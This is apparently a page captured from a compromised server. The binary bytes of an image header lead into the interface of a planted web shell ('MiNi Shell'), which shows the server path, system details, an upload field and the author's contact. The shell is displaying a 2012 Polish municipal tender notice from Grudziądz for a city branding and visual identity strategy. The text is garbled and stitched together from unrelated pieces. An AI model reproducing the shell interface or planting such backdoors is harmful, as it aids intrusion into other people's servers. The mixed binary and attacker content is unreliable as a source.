JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120305/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120305/51363-N-2012.html

<p class="kh_header"><b>Grudziądz: Opracowanie strategii promocji marki oraz identyfikacji wizualnej Grudziądza na lata 2012-2017</b><br>
<b>Numer ogłoszenia: 51363 - 2012; data zamieszczenia: 05.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 4510233, faks 56 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie strategii promocji marki oraz identyfikacji wizualnej Grudziądza na lata 2012-2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie strategii promocji marki oraz identyfikacji wizualnej Grudziądza na lata 2012 - 2017, której głównym celem jest: 
- budowa silnej, prestiżowej marki Grudziądza, 
- efektywna poprawa konkurencyjności oferty turystycznej,
- efektywna poprawa gospodarczej atrakcyjności,
- wytworzenie u mieszkańców silnego poczucia identyfikacji z nowym wizerunkiem Grudziądza,
- powstanie długookresowych wytycznych strategicznych dla marki Grudziądz wraz z planem wdrożenia tych wytycznych.
Szczegółowy opis przedmiotu zamówienia:
Celem zamówienia jest opracowanie strategii promocji marki i identyfikacji wizualnej Grudziądza. Dokument ten ma wskazać metody i narzędzia marketingu gospodarczego i terytorialnego ze szczególnym uwzględnieniem promocji turystycznej. Wynikiem realizacji przedmiotu zamówienia mają być długookresowe wytyczne strategiczne dla marki miasta Grudziądza oraz plan wdrożenia tych wytycznych. 
Produktami przedmiotu zamówienia będą: 
- strategia promocji marki, 
- system identyfikacji wizualnej marki, 
- zakres usług turystycznych, 
- plan wdrożenia strategii,
- spotkania w formie konsultacji społecznych. 
Rezultatem wdrożenia strategii ma być poprawa atrakcyjności i konkurencyjności turystycznej i gospodarczej Grudziądza poprzez wytworzenie rozpoznawalnej marketingowo i wizerunkowo marki miasta Grudziądz. Wykonawca w ramach zamówienia ma wykonać prace badawcze, analityczne, koncepcyjne i redakcyjne prowadzące do opracowania strategii promocji marki i identyfikacji wizualnej Grudziądza na lata 2012-2017.	 
Rezultatem realizacji przedmiotu zamówienia będzie określenie i wypromowanie nowej marki Grudziądza. Efektem wdrożenia i opracowania strategii promocji będzie uspójnienie komunikatów promocyjnych Grudziądza wysyłanych przez podmioty zaangażowane w działania promocyjne (Urząd Miejski, jednostki miejskie takie jak: spółki miejskie, jednostki organizacyjne i jednostki podległe), oraz nadanie jednej identyfikacji wizualnej (kolorystyka i layout) wszystkim wydawnictwom informacyjnym i promocyjnym realizowanym przez podmioty zaangażowane w działania promocyjne. 
Głównymi    celami   opracowania   strategii   promocji   marki  i  identyfikacji  wizualnej  Grudziądza  na  lata 2012-2017 są:
a. budowa silnej marki Grudziądza,
b. zwiększenie liczby turystów i inwestorów,
c. efektywne podniesienie konkurencyjności oferty turystycznej i inwestycyjnej Grudziądza,
d. pobudzenie i wykorzystanie przedsiębiorczości mieszkańców,
e. aktywizacja społeczna mieszkańców i wykorzystanie silnego poczucia identyfikacji,
z miastem;
f. przygotowanie materiału stanowiącego podstawę do zmiany wizerunku Grudziądza,
g. określenie misji, wizji, wskazanie głównych kierunków działań Grudziądza na lata 2012-2017 (cele strategiczne i operacyjne).
ETAP I Badania i analizy wizerunkowe, analiza stanu obecnego:
1.Analiza sytuacji obecnej (diagnoza stanu obecnego) na podstawie materiałów źródłowych oraz badania wizerunku miasta Grudziądza. 
Analiza powinna obejmować m. in.:
- analizę pozycji miasta na tle województwa kujawsko-pomorskiego,
- analizę usług i produktów turystycznych,
- określenie i badania reprezentatywnej grupy społecznej,
- analizę pozycji i konkurencyjności Grudziądza na tle innych polskich miast,
- określenie podstawowych problemów do rozwiązania w zakresie działań promocji gospodarczej 
i turystycznej,
- analizę obecnych zasobów turystycznych i potencjału obszaru przez pryzmat kierunku rozwoju marki.
Badania rynku i analizy prowadzone w ramach tego etapu będą podstawą dla opracowania strategii promocji i identyfikacji wizualnej Grudziądza na lata 2012-2017. Badania te mają służyć utworzeniu wizerunku Grudziądza, a także określeniu pozycji Grudziądza na tle innych miast. 	
Wykonawca na podstawie przeprowadzonych badań i analiz ma uzyskać informacje dotyczące zabytków, atrakcji turystycznych, istniejącej infrastruktury turystycznej i towarzyszącej, obiektów rekreacyjnych, kultury, historii, ludzi, symboli, profilu społecznego, politycznego i gospodarczego. Ma uzyskać wiedzę pochodzącą od badanej grupy, z danych statystycznych oraz materiałów źródłowych dot. aktualnej oraz pożądanej sytuacji na badanym obszarze. 
Przeprowadzona analiza efektywności turystycznej powinna wykazać posiadane zasoby, stopień ich wykorzystania oraz możliwość i realność podniesienia konkurencyjności turystycznej Grudziądza poprzez jego rozwój i promocję. Badania powinny być przeprowadzone na terenie miasta Grudziądza oraz województwa kujawsko-pomorskiego w celu uzyskania jak najdokładniejszego wizerunku Grudziądza jaki funkcjonuje wśród mieszkańców oraz wśród obecnych i potencjalnych turystów.
Wykonawca w ramach zamówienia jest zobowiązany do wyboru reprezentatywnej próby zachowującej strukturę wyróżnionych cech populacji przy założonym poziomie istotności. Wynikiem ma być opracowanie raportu z badań i analiz oraz wskazanie jednego lub kilku kierunków budowania strategii.
Minimalne wymogi dotyczące właściwego doboru próby:
- minimalna liczebność próby: 300 osób,
- kategorie wymagane przez Zamawiającego: wiek, płeć, miejsce zamieszkania, status społeczny,  
- obszar przeprowadzania badań: Grudziądz oraz województwo kujawsko-pomorskie. 
2. Wyniki badań rynku i konsultacji społecznych - spotkanie konsultacyjne w wyznaczonych przez Wykonawcę obszarach funkcjonowania miasta (cel -analiza mocnych i słabych stron oraz szans 
i zagrożeń - analiza SWOT). Celem głównym będzie analiza sytuacji wyjściowej dla opracowania Strategii. 
Konsultacje powinny być przeprowadzone na terenie Grudziądza, a Zamawiający musi mieć możliwość uczestniczenia w nich. Wykonawca odpowiada za: organizację sesji konsultacyjnych, organizację sali, przekazanie zaproszeń, przygotowanie materiałów dla uczestników oraz przygotowanie merytoryczne do poprowadzenia konsultacji. Wykonawca przedstawi Zamawiającemu do akceptacji listę uczestników, terminy i miejsca. 
Minimalne wymogi dotyczące liczebności uczestników spotkań konsultacyjnych:
- liczebność grupy - minimum 15 osób,
- ilość spotkań: minimum - 1 spotkanie,
- kryteria doboru grupy: przedstawiciele Urzędu Miejskiego w Grudziądzu, przedstawiciele jednostek samorządu Grudziądza.
3. Analiza w zakresie pozycji i konkurencyjności Grudziądza:
- analizy wizerunku Grudziądza w wewnętrznych (tj. wśród mieszkańców) i zewnętrznych (tj. spoza Grudziądza) grupach docelowych określonych dla celów promocji, z uwzględnieniem różnorodnych aspektów wizerunku, 
- identyfikacja i charakterystyka miast konkurencyjnych dla Grudziądza, 
- określenia względnej atrakcyjności Grudziądza: turystycznej, gospodarczej oraz pod względem zamieszkania, w relacji do miast konkurencyjnych,
- charakterystyki produktu marketingowego Grudziądza, ze szczególnym uwzględnieniem subproduktów: turystycznego, gospodarczego,
- charakterystyki przedsięwzięć o charakterze promocyjnym realizowanych dotychczas przez władze samorządowe miasta Grudziądza oraz inne podmioty działające na rzecz promocji miasta i kreowania pozytywnego wizerunku.
ETAP II Opracowanie dokumentu strategii promocji marki
4. Określenie misji - wskazanie głównego kierunku działania Grudziądza na lata 2012-2017.
5.Określenie podstawowych problemów i sposobów ich rozwiązywania z uwzględnieniem 
m. in. słabych i mocnych stron, szans i zagrożeń zawartych w analizie SWOT.
6. Definicja marki Grudziądza oraz określenie sub-marek w trzech kategoriach: turystycznej, gospodarczej i wewnętrznej. 
Projekty rozwiązań wykorzystujących i propagujących współpracę różnych środowisk na rzecz promocji marki miasta, w szczególności angażujących władze miasta, środowiska społeczne, naukowe, kultury i biznesu z obszaru miasta. 
7.Planowanie działań promocyjnych na lata 2012-2017 (określenie m.in. grup docelowych, wybór i opis unikalnej cechy miasta):
- sposoby i środki realizacji celów, 
- określenie działań komunikacyjnych w celu umiejętnego zarządzania wizerunkiem 
i marką Grudziądza, 
- określenie kanałów komunikacji (PR, reklama, outdoor, marketing bezpośredni etc.), 
- opracowanie zestawu narzędzi do komunikacji marketingowej, 
- określenie harmonogramu realizacji priorytetów, kierunków, celów i zadań strategii promocji,
- opracowanie planu promocji w latach 2012-2017, plan powinien zostać skonsultowany z Zamawiającym, 
- harmonogram wdrożenia działań komunikacyjnych wskazówki dla podmiotów, odpowiedzialnych za planowanie, finansowanie i zarządzanie promocyjne oraz wskazanie dobrych praktyk. 
ETAP III Opracowanie systemu identyfikacji wizualnej 
8.Zbudowanie nowego systemu identyfikacji wizualnej miasta w oparciu o wyznaczone 
we wcześniejszym etapie priorytety i kierunki promocji marki Grudziądza.
9.Katalog jednolitej identyfikacji wizualnej i werbalnej marki - poprzez opracowanie księgi marki Grudziądza stanowiącej załącznik do Strategii. System identyfikacji wizualnej powinien zawierać:
- katalog elementów bazowych tożsamości wizualnej Grudziądza, w tym m. in.: określenie i skatalogowanie kolorystyki znaku promocyjnego według podstawowych systemów (w tym: CMYK, RGB, PANTONE, RAL, skala szarości); określenie precyzyjnych zasad wykorzystywania 
i ewentualnego współwystępowania znaku promocyjnego, określenie typografii dla różnych form komunikacji (urzędowa, promocyjna),
- katalog jednolitego systemu identyfikacji wizualnej Grudziądza zawierający projekty następujących elementów:
-bilety wizytowe, papiery korespondencyjne,
-koperty, teczki, zaproszenia,
-dyplomy i papeterie poczty elektronicznej,
-prezentacje Power Point,
-foldery informacyjne np. raporty, sprawozdania, opracowania,
-foldery promocyjne,
-serwisy www - kolorystyka, rozmieszczenie i wygląd kluczowych elementów,
-banery internetowe, reklamy outdoor, wielkoformatowe, 
-ogłoszenia prasowe, reklamy prasowe,
-plakaty i banery umieszczane podczas imprez i wydarzeń,
-gadżety reklamowe i torby papierowe na upominki,
-zasady i procedury przyznawania prawa posługiwania się elementami tożsamości wizualnej Grudziądza.
-ewentualnie inne elementy zaproponowane przez Wykonawcę.
Opracowanie Strategia promocji marki i identyfikacji wizualnej Grudziądza na lata 2012-2017 wraz z załącznikami ma być dostarczone Zamawiającemu w 2 zestawach, składających się z:
- wersji drukowanej,
- wersji elektronicznej na płytach CD lub DVD (formaty: zgodny z Microsoft Word 
dla systemu operacyjnego Windows oraz format pdf),
- prezentacji Microsoft Power Point dla systemu operacyjnego Windows - na płytach CD lub DVD; przy czym dla wersji elektronicznej oraz prezentacyjnej wszystkie obiekty źródłowe (w tym obiekty graficzne), które zostały wykonane w innych programach powinny być załączone w postaci plików programów źródłowych. Wykonawca powinien posiadać do ww. obiektów źródłowych autorskie prawa majątkowe w niezbędnym zakresie.
Opracowanie strategii promocji marki i identyfikacji wizualnej Grudziądza na lata 2012-2017 pozwoli na połączenie działań podejmowanych do tej pory, jak również zaplanowanie przyszłych projektów, pomysłów oraz pozwoli na określenie zakresu i intensywności działań promocyjnych. 
Plan promocji ma uwzględniać wypracowane wcześniej wnioski: zakładane do osiągnięcia cele, produkty turystyczne, grupy docelowe do których skierowany będzie plan oraz możliwości zastosowania różnych narzędzi m.in.: strony internetowe, media, publikacje i materiały promocyjne, imprezy i inne. 
Zamawiający wymaga, aby w planie promocji zostały w szczególności opracowane kompleksowe działania mające na celu stworzenie, wdrożenie i promocję produktów turystycznych. W tym planie Wykonawca zobowiązany jest wskazać źródła finansowania poszczególnych przedsięwzięć.
Współpraca Zamawiającego z Wykonawcą.
Zamawiający zobowiązuje się ścisłej współpracy z wykonawcą w ramach dokonywania akceptacji, konsultacji lub wskazywania obszarów wymagających poprawy w przedstawionych dokumentach i koncepcjach. Zamawiający będzie dokonywał opisanych czynności bez zbędnej zwłoki, w czasie nie dłuższym niż 4 dni robocze. 	
Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku formularza ofertowego zakres zamówienia powierzany podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 2 usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w wymaganym okresie wykonał minimum 2 opracowania na tematy związane z opracowaniem strategii promocji/strategii komunikacji marketingowej/strategii marketingowej/strategii marki dla miast lub województw (nazwa miasta lub województwa) wraz z systemem wizualizacji/identyfikacji wizualnej o wartości  co najmniej 100.000 zł brutto każde.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że dysponują osobami, które wykonały co najmniej 2 opracowania na temat strategii promocji/strategii komunikacji marketingowej/strategii marketingowej/strategii marki dla miast lub województw (nazwa miasta lub województwa) o wartości  co najmniej 100.000 zł brutto każde.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie potwierdzenia, że oferowane usługi odpowiadają określonym wymaganiom należy przedłożyć  opracowanie zawierające syntetyczny, kompleksowy opis koncepcji, metod i narzędzi zmierzających do wykonania przedmiotu zamówienia. Opracowanie posłuży do merytorycznej oceny oferty według następujących kryteriów:
1. proponowana metodologia kreacji marki 
- metody i narzędzia używane w procesie kreacji marki,
- sposób realizacji pozostałych działań realizujących założenia SIWZ,
- kreatywność w sposobie realizacji poszczególnych etapów działań,
- propozycja sposobu komunikacji poprzez media procesu realizacji warunków zamówienia,
- proponowany sposób zaangażowania mieszkańców miasta, grup opiniotwórczych oraz przedstawicieli Zamawiającego w realizację wszelkich istotnych działań przy realizacji zamówienia,
- sposób skutecznego informowania opinii publicznej o wynikach tych działań.
2. proponowana metodologia przeprowadzenia konsultacji społecznych 
- tematyka spotkań konsultacyjnych,
- proponowana formuła spotkań konsultacyjnych,
- dobór i ilość grup konsultacyjnych,
- sposób zapraszania na spotkania i informowania o ich przebiegu i efektach,
- kreatywność w podejściu do przeprowadzanych konsultacji społecznych 
i opiniowania wypracowanych założeń,
3. harmonogram działań i jego spójność
- plan proponowanych działań,
- terminarz działań,
- wykazanie zależności i spójności pomiędzy każdym z etapów prac nad realizacją przedmiotu zamówienia, 
4. zasady współpracy podmiotu z Zamawiającym
- formy komunikacji z Zamawiającym; sposób informowania o zaplanowanych 
i wykonywanych zadaniach;
- sposób przedstawiania Zamawiającemu pomysłów i konkretnych rozwiązań usprawniających realizację przedmiotu zamówienia;
- sposób rozwiązywania sytuacji kryzysowych powstałych przy procesie realizacji przedmiotu zamówienia lub pośrednio z nim związanych.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę nie wymienioną (osoby nie wymienione) w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii notarialnie poświadczonej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Wartość merytoryczna - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2012 godzina 10:00, miejsce: Biuro Zamówień Publicznych Urzędu Miejskiego w Grudziądzu, ul. Ratuszowa 1, 86-300 Grudziądz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Opracowanie strategii promocji marki i identyfikacji wizualnej Grudziądza na lata 2012 - 2017 jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach działania 5.5. Promocja i rozwój markowych produktów Regionalnego Programu Operacyjnego Województwa Kujawsko - Pomorskiego na lata 2007 - 2013. Umowa o dofinansowanie Projektu o numerze WPW.II..433.5.103/2011 zawarta została w dniu 22 grudnia 2011 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com